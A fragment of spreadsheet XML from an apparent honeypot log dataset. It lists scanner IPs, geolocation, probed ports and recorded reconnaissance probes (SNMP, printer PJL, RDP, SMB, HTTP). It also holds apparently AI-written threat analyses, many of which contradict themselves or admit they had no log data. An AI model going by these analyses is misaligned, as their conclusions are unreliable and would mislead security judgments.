  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;53&amp;&amp;27674&amp;&amp;36148&amp;&amp;50606&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:dc84:1f9e</t>
  </si>
  <si>
    <t>There is no log data provided, so I have nothing to analyze. &amp;&amp; No malicious activity detected, as there is no log data provided. &amp;&amp; Telnet access attempt was made but service status is unknown. 
No further action was taken due to unknown status. 
This could be an error or legitimate issue. &amp;&amp; No log data provided. 
However, I can still provide some general information about what honeypot logs might indicate:
Possible malicious activity involves unauthorized access attempts to various services such as login brute forcing or probing of open ports with the intent to exploit vulnerabilities. The attacker may be attempting to gain unauthorized access to sensitive areas of a network by exploiting weaknesses in system configurations or by trying out common usernames and passwords.</t>
  </si>
  <si>
    <t>There's no log data provided to analyze. If you provide the log data, I'll be happy to help you identify the type of attacks. &amp;&amp; I need log data to analyze. Please provide it so I can identify the type of attack.</t>
  </si>
  <si>
    <t>057bec7845190fdd76d6483f0b8b90a8</t>
  </si>
  <si>
    <t>73.93.25.112</t>
  </si>
  <si>
    <t>c-73-93-25-112.hsd1.ca.comcast.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>95052</t>
  </si>
  <si>
    <t>37.3541</t>
  </si>
  <si>
    <t>-121.955</t>
  </si>
  <si>
    <t>::ffff:495d:1970</t>
  </si>
  <si>
    <t>4a96d8c33e45af969535c61eb660b193</t>
  </si>
  <si>
    <t>103.245.71.13</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H36&amp;&amp;SMA-LAB_LDAP_H44&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H28&amp;&amp;SMA-LAB_MSSQL_H31</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;389&amp;&amp;1433&amp;&amp;NA</t>
  </si>
  <si>
    <t>Virār (Vasai West)</t>
  </si>
  <si>
    <t>1253133</t>
  </si>
  <si>
    <t>401303</t>
  </si>
  <si>
    <t>19.3812</t>
  </si>
  <si>
    <t>72.8281</t>
  </si>
  <si>
    <t>131442</t>
  </si>
  <si>
    <t>Digital Network Associates Pvt Ltd</t>
  </si>
  <si>
    <t>Signet Digital Private Limited</t>
  </si>
  <si>
    <t>Signet Digital Pvt. Ltd.</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.245.71.13,60757)}&amp;&amp;{Data_SMB:Incoming connection (103.245.71.13,60834)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.245.71.13,55723)}&amp;&amp;{Data_SMB:Incoming connection (103.245.71.13,55821)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.245.71.13,58948)}&amp;&amp;{Data_SMB:Incoming connection (103.245.71.13,59035)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.245.71.13,49956)}&amp;&amp;{Data_SMB:Incoming connection (103.245.71.13,50056)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.245.71.13,53403)}&amp;&amp;{Data_SMB:Incoming connection (103.245.71.13,53489)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.245.71.13,58712)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.245.71.13,58778)}&amp;&amp;{Data_SMB:Incoming connection (103.245.71.13,60315)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.245.71.13,60441)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.245.71.13,60590)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.245.71.13,60686)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.245.71.13,51809)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (103.245.71.13,51885)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}</t>
  </si>
  <si>
    <t>::ffff:67f5:470d</t>
  </si>
  <si>
    <t>No log data provided, cannot analyze potential malicious activity.</t>
  </si>
  <si>
    <t>0ba553552f74a270576af7514b42fd50</t>
  </si>
  <si>
    <t>117.252.50.218</t>
  </si>
  <si>
    <t>::ffff:75fc:32da</t>
  </si>
  <si>
    <t>No log data provided, cannot analyze. &amp;&amp; There is insufficient log data provided for analysis.</t>
  </si>
  <si>
    <t>d86c6f8a236ad303a2a651fec5429ef8</t>
  </si>
  <si>
    <t>125.229.131.113</t>
  </si>
  <si>
    <t>NA&amp;&amp;125-229-131-113.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MYSQL_H44&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H43&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H37</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;3306&amp;&amp;55533&amp;&amp;23&amp;&amp;6111&amp;&amp;58497&amp;&amp;80&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>2005-10-18</t>
  </si>
  <si>
    <t>HINET-NET</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7de5:8371</t>
  </si>
  <si>
    <t>789c7e769ca0aadc9907bb2187232dc3</t>
  </si>
  <si>
    <t>188.165.243.144</t>
  </si>
  <si>
    <t>divine.probe.onyphe.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_RDP_H21&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_RDP_H41&amp;&amp;SMA-LAB_RDP_H38&amp;&amp;SMA-LAB_RDP_H27&amp;&amp;SMA-LAB_RDP_H40&amp;&amp;SMA-LAB_RDP_H17&amp;&amp;SMA-LAB_RDP_H34&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H2&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H28&amp;&amp;SMA-LAB_RDP_H14&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_RDP_H46&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_RDP_H26&amp;&amp;SMA-LAB_RDP_H29</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;3389&amp;&amp;22&amp;&amp;3377&amp;&amp;5900&amp;&amp;33358&amp;&amp;54562&amp;&amp;44556</t>
  </si>
  <si>
    <t>OVH ISP</t>
  </si>
  <si>
    <t>2009-06-05</t>
  </si>
  <si>
    <t>connection&amp;&amp;NA&amp;&amp;stshash</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash='}}</t>
  </si>
  <si>
    <t>::ffff:bca5:f390</t>
  </si>
  <si>
    <t>No VNC activity was detected, indicating potential attempts to exploit or scan for vulnerable services that use Virtual Network Computing protocol. 
However, the lack of VNC activity could also be due to legitimate reasons.
This might imply a scanning or probing attempt. &amp;&amp; No VNC connection attempted. 
There is no indication of malicious activity. 
This log entry suggests that there were no notable attempts to access or exploit VNC service during this time period. &amp;&amp; No RDP activity was detected, indicating normal service operation or lack of malicious attempts to access it. This could be due to an absence of potential attackers or proper security measures in place. No suspicious traffic was observed on this service.</t>
  </si>
  <si>
    <t>VNC Attack &amp;&amp; RDP Bruteforce</t>
  </si>
  <si>
    <t>61c1f5c15618d54c4aa763ee1441cdbb</t>
  </si>
  <si>
    <t>59.91.185.79</t>
  </si>
  <si>
    <t>::ffff:3b5b:b94f</t>
  </si>
  <si>
    <t>Possible brute force attempt or probing for a telnet service, likely scanning for vulnerabilities or trying to gain unauthorized access. No activity detected as the service is not active according to log data, suggesting potential malicious intent was thwarted. Inactive service poses no immediate risk but may indicate ongoing reconnaissance efforts. &amp;&amp; No attempt was made to connect or interact with the telnet service, indicating no malicious activity was detected via this method. However, it's possible that the connection was blocked by a security measure before any interaction occurred. This could also indicate the service is currently inactive.</t>
  </si>
  <si>
    <t>166a4ad63325ae4d52fc07fb10337627</t>
  </si>
  <si>
    <t>198.235.24.99</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_SNMP_H36&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_ORACLE_H29&amp;&amp;SMA-LAB_LDAP_H26&amp;&amp;SMA-LAB_LDAP_H7&amp;&amp;SMA-LAB_LDAP_H32&amp;&amp;SMA-LAB_ORACLE_H14&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_IMAP_H24&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_POP3_H46&amp;&amp;SMA-LAB_RDP_H42&amp;&amp;SMA-LAB_FTP_H6&amp;&amp;SMA-LAB_NTP_H44&amp;&amp;SMA-LAB_POP3_H25&amp;&amp;SMA-LAB_POP3_H35&amp;&amp;SMA-LAB_FTP_H8&amp;&amp;SMA-LAB_RDP_H26&amp;&amp;SMA-LAB_IMAP_H27&amp;&amp;SMA-LAB_IMAP_H14&amp;&amp;SMA-LAB_SOCKS5_H6&amp;&amp;SMA-LAB_PJL_H23&amp;&amp;SMA-LAB_PJL_H8&amp;&amp;SMA-LAB_POSTGRES_H34&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_ORACLE_H13&amp;&amp;SMA-LAB_ORACLE_H37&amp;&amp;SMA-LAB_LDAP_H18&amp;&amp;SMA-LAB_SIP_H14&amp;&amp;SMA-LAB_REDIS_H23&amp;&amp;SMA-LAB_ORACLE_H31&amp;&amp;SMA-LAB_ORACLE_H18&amp;&amp;SMA-LAB_IMAP_H25&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_PJL_H40&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_SNMP_H2&amp;&amp;SMA-LAB_SOCKS5_H31&amp;&amp;SMA-LAB_HTTPS_H40&amp;&amp;SMA-LAB_POP3_H44&amp;&amp;SMA-LAB_REDIS_H44&amp;&amp;SMA-LAB_RDP_H39&amp;&amp;SMA-LAB_LDAP_H46&amp;&amp;SMA-LAB_IMAP_H28&amp;&amp;SMA-LAB_MYSQL_H14&amp;&amp;SMA-LAB_SIP_H22&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_SNMP_H17&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_POSTGRES_H15&amp;&amp;SMA-LAB_LDAP_H11&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_POSTGRES_H18&amp;&amp;SMA-LAB_SIP_H46&amp;&amp;SMA-LAB_FTP_H47&amp;&amp;SMA-LAB_LDAP_H44&amp;&amp;SMA-LAB_MT-CPA_H11&amp;&amp;SMA-LAB_POP3_H41&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_MSSQL_H39&amp;&amp;SMA-LAB_IMAP_H29&amp;&amp;SMA-LAB_MSSQL_H24&amp;&amp;SMA-LAB_NTP_H7&amp;&amp;SMA-LAB_IMAP_H17&amp;&amp;SMA-LAB_SOCKS5_H44&amp;&amp;SMA-LAB_SOCKS5_H18&amp;&amp;SMA-LAB_SOCKS5_H8&amp;&amp;SMA-LAB_FTP_H3&amp;&amp;SMA-LAB_SNMP_H46&amp;&amp;SMA-LAB_SNMP_H22&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_IMAP_H31&amp;&amp;SMA-LAB_IMAP_H47&amp;&amp;SMA-LAB_MYSQL_H44&amp;&amp;SMA-LAB_IMAP_H36&amp;&amp;SMA-LAB_POP3_H7&amp;&amp;SMA-LAB_ORACLE_H16&amp;&amp;SMA-LAB_MSSQL_H19&amp;&amp;SMA-LAB_POP3_H22&amp;&amp;SMA-LAB_SNMP_H13&amp;&amp;SMA-LAB_ORACLE_H27&amp;&amp;SMA-LAB_POSTGRES_H16&amp;&amp;SMA-LAB_SOCKS5_H33&amp;&amp;SMA-LAB_POSTGRES_H47&amp;&amp;SMA-LAB_NTP_H26&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_SIP_H47&amp;&amp;SMA-LAB_MYSQL_H23&amp;&amp;SMA-LAB_IRC_H16&amp;&amp;SMA-LAB_SIP_H12&amp;&amp;SMA-LAB_RDP_H44&amp;&amp;SMA-LAB_SOCKS5_H39&amp;&amp;SMA-LAB_SOCKS5_H23&amp;&amp;SMA-LAB_FTP_H5&amp;&amp;SMA-LAB_FTP_H36&amp;&amp;SMA-LAB_SNMP_H23&amp;&amp;SMA-LAB_SOCKS5_H38&amp;&amp;SMA-LAB_LDAP_H12&amp;&amp;SMA-LAB_PJL_H27&amp;&amp;SMA-LAB_SNMP_H37&amp;&amp;SMA-LAB_SIP_H28&amp;&amp;SMA-LAB_IMAP_H18&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_POSTGRES_H9&amp;&amp;SMA-LAB_NTP_H38&amp;&amp;SMA-LAB_SOCKS5_H7&amp;&amp;SMA-LAB_FTP_H13&amp;&amp;SMA-LAB_IMAP_H20&amp;&amp;SMA-LAB_MSSQL_H9&amp;&amp;SMA-LAB_SNMP_H26&amp;&amp;SMA-LAB_SNMP_H33</t>
  </si>
  <si>
    <t>53&amp;&amp;161&amp;&amp;51678&amp;&amp;1521&amp;&amp;389&amp;&amp;23&amp;&amp;143&amp;&amp;51147&amp;&amp;110&amp;&amp;3389&amp;&amp;NA&amp;&amp;1080&amp;&amp;9100&amp;&amp;5432&amp;&amp;6379&amp;&amp;37534&amp;&amp;443&amp;&amp;54471&amp;&amp;3306&amp;&amp;1433&amp;&amp;56194&amp;&amp;5900&amp;&amp;51459&amp;&amp;52831&amp;&amp;51673&amp;&amp;6667&amp;&amp;21&amp;&amp;52034&amp;&amp;445&amp;&amp;56351&amp;&amp;54977&amp;&amp;80&amp;&amp;49487&amp;&amp;55932&amp;&amp;55871&amp;&amp;50933</t>
  </si>
  <si>
    <t>query&amp;&amp;connection&amp;&amp;request&amp;&amp;stshash&amp;&amp;command&amp;&amp;NA&amp;&amp;GET</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=rleiOFrhR'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=fvOIRt'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=sCGLbW'}}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.99,58886)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.99,58890)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.99,58902)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.99,63416)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.99,63418)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.99,63432)}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.99,62340)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.99,62342)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.99,62350)}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.99,58090)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.99,58102)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.99,58108)}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.99,63550)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.99,63554)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.99,63564)}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=VzJNMaAod'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=GYicqK'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=gDIAzu'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=lnCZsdZdF'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}</t>
  </si>
  <si>
    <t>::ffff:c6eb:1863</t>
  </si>
  <si>
    <t>Possible malicious activity is an unauthorized printer remote management attempt with the goal of gathering information from the target system. The attacker is likely trying to extract sensitive details about the system's configuration and capabilities. This could be a reconnaissance step before further exploitation. &amp;&amp; Malicious printer exploitation attempt detected, attacker trying to retrieve device information through unauthorized print job submission. This is a common tactic used by attackers to gather sensitive data about the target system. The attacker may use this information for further attacks or exploits. &amp;&amp; This suggests an attempt to retrieve printer information, possibly as reconnaissance for further exploitation. The use of a non-standard command could indicate malicious intent. This may be a precursor to more serious attacks on the network. &amp;&amp; Possible malicious activity involves an attacker attempting to exploit printer configuration vulnerabilities by sending a command that could allow unauthorized access or control over the system's print settings and functionality. This is typically done as reconnaissance prior to more significant attacks, or it can also be part of a broader phishing strategy aimed at employees with elevated privileges to print services.</t>
  </si>
  <si>
    <t>FTP TLS &amp;&amp; Tls Auth &amp;&amp; Printer Scanning &amp;&amp; PortScan &amp;&amp; Print Job Lure</t>
  </si>
  <si>
    <t>c80d64aacf266339971cd912a32ea99a</t>
  </si>
  <si>
    <t>5.27.150.202</t>
  </si>
  <si>
    <t>743932</t>
  </si>
  <si>
    <t>34860</t>
  </si>
  <si>
    <t>::ffff:51b:96ca</t>
  </si>
  <si>
    <t>0c688096d77c77745baf6665a8064b5e</t>
  </si>
  <si>
    <t>13.217.109.29</t>
  </si>
  <si>
    <t>AMAZON-AES</t>
  </si>
  <si>
    <t>::ffff:dd9:6d1d</t>
  </si>
  <si>
    <t>No log data provided, cannot analyze any malicious activity. &amp;&amp; No log data provided, therefore no analysis can be made about possible malicious activity.</t>
  </si>
  <si>
    <t>2459644ce90362f193d9999f20322c16</t>
  </si>
  <si>
    <t>117.214.72.51</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>63458&amp;&amp;23</t>
  </si>
  <si>
    <t>::ffff:75d6:4833</t>
  </si>
  <si>
    <t>No TELNET activity was detected during this monitoring period, which is unusual as most systems allow some form of network connection. This suggests an attacker may have attempted to connect but was unsuccessful or blocked. Lack of TELNET activity could be indicative of a targeted attack attempting to evade detection. &amp;&amp; No TELNET activity detected, possible scan or probing attempt to identify vulnerable services. No malicious connection established through this service. Normal activity indicates no suspicious behavior detected.</t>
  </si>
  <si>
    <t>007a7ab8d856ff4137a08ae3fe3cf8b3</t>
  </si>
  <si>
    <t>185.254.75.36</t>
  </si>
  <si>
    <t>SMA-LAB_VNC_HC1</t>
  </si>
  <si>
    <t>Düsseldorf</t>
  </si>
  <si>
    <t>2934246</t>
  </si>
  <si>
    <t>40213</t>
  </si>
  <si>
    <t>51.2277</t>
  </si>
  <si>
    <t>6.77346</t>
  </si>
  <si>
    <t>43357</t>
  </si>
  <si>
    <t>OWL</t>
  </si>
  <si>
    <t>Mullvad</t>
  </si>
  <si>
    <t>::ffff:b9fe:4b24</t>
  </si>
  <si>
    <t>No VNC connection attempt detected, implying normal service usage or lack of probing attempts. &amp;&amp; The data indicates an attempt to establish a VNC connection, which is often used for unauthorized remote access or control of systems.
This could be a sign of malicious activity such as reconnaissance or lateral movement by an attacker.
Further investigation would be needed to determine the full scope and intention behind this attempt.</t>
  </si>
  <si>
    <t>VNC Attack &amp;&amp; VNC Bruteforce</t>
  </si>
  <si>
    <t>36343b51d9bbc591cbe856bee4c201e5</t>
  </si>
  <si>
    <t>45.134.142.210</t>
  </si>
  <si>
    <t>FL</t>
  </si>
  <si>
    <t>Florida</t>
  </si>
  <si>
    <t>Miami-Dade County</t>
  </si>
  <si>
    <t>Miami</t>
  </si>
  <si>
    <t>4164138</t>
  </si>
  <si>
    <t>33102</t>
  </si>
  <si>
    <t>25.7617</t>
  </si>
  <si>
    <t>-80.1918</t>
  </si>
  <si>
    <t>Cdnext MIA</t>
  </si>
  <si>
    <t>::ffff:2d86:8ed2</t>
  </si>
  <si>
    <t>Unknown activity detected, possibly an attempted MySQL connection or database scan. The data indicates no login credentials were provided, suggesting a probing or reconnaissance attempt. This could be a precursor to a more malicious action such as unauthorized access or data theft. &amp;&amp; No data was sent or received for MySQL service, indicating potential probing or scanning activity. 
This could be an attempt to identify vulnerabilities in the system. 
It may also indicate a scanner looking for open ports or services.</t>
  </si>
  <si>
    <t>b5750c24bf26b9e0d16a0f7a6b1529d6</t>
  </si>
  <si>
    <t>60.43.35.52</t>
  </si>
  <si>
    <t>i60-43-35-52.s30.a048.ap.plala.or.jp&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19</t>
  </si>
  <si>
    <t>2004-04-02</t>
  </si>
  <si>
    <t>OCN</t>
  </si>
  <si>
    <t>['dns-sa1.plala.or.jp', 'dns-sd1.plala.or.jp', 'ns2.sphere.ad.jp']</t>
  </si>
  <si>
    <t>Connected (2025/07/31)</t>
  </si>
  <si>
    <t>::ffff:3c2b:2334</t>
  </si>
  <si>
    <t>262d22120b23bbf9685bee0e7d30e947</t>
  </si>
  <si>
    <t>117.205.149.3</t>
  </si>
  <si>
    <t>::ffff:75cd:9503</t>
  </si>
  <si>
    <t>44a19ec63b9dd21742b23fc483fd32f9</t>
  </si>
  <si>
    <t>59.91.33.194</t>
  </si>
  <si>
    <t>Ajmer</t>
  </si>
  <si>
    <t>1279159</t>
  </si>
  <si>
    <t>305001</t>
  </si>
  <si>
    <t>26.4499</t>
  </si>
  <si>
    <t>74.6399</t>
  </si>
  <si>
    <t>BSNL-GSM-SouthZone</t>
  </si>
  <si>
    <t>::ffff:3b5b:21c2</t>
  </si>
  <si>
    <t>c10d9f32f8605a9468a956bac71e0cb9</t>
  </si>
  <si>
    <t>117.217.86.165</t>
  </si>
  <si>
    <t>2477&amp;&amp;23</t>
  </si>
  <si>
    <t>::ffff:75d9:56a5</t>
  </si>
  <si>
    <t>This log suggests that there was an attempted connection to the TELNET service, but no data was received from this connection attempt, possibly indicating a reconnaissance probe. The lack of data transmitted might indicate that the attacker is trying to detect if the service is active or not. This could be a precursor to further malicious activity. &amp;&amp; No TELNET activity was detected, which suggests an attempt to bypass or evade TELNET-based monitoring or detection systems may have been attempted. This could be a sign of a malicious actor trying to remain undetected. The lack of TELNET activity in itself is not necessarily suspicious but may indicate attempts to obscure true intentions.</t>
  </si>
  <si>
    <t>d7d2bd0fd4295ce68a85bf36031bc931</t>
  </si>
  <si>
    <t>5.205.138.54</t>
  </si>
  <si>
    <t>IB</t>
  </si>
  <si>
    <t>Balearic Islands</t>
  </si>
  <si>
    <t>Capdepera</t>
  </si>
  <si>
    <t>2520200</t>
  </si>
  <si>
    <t>07580</t>
  </si>
  <si>
    <t>39.7024</t>
  </si>
  <si>
    <t>3.43532</t>
  </si>
  <si>
    <t>Telefonica_de_Espana</t>
  </si>
  <si>
    <t>::ffff:5cd:8a36</t>
  </si>
  <si>
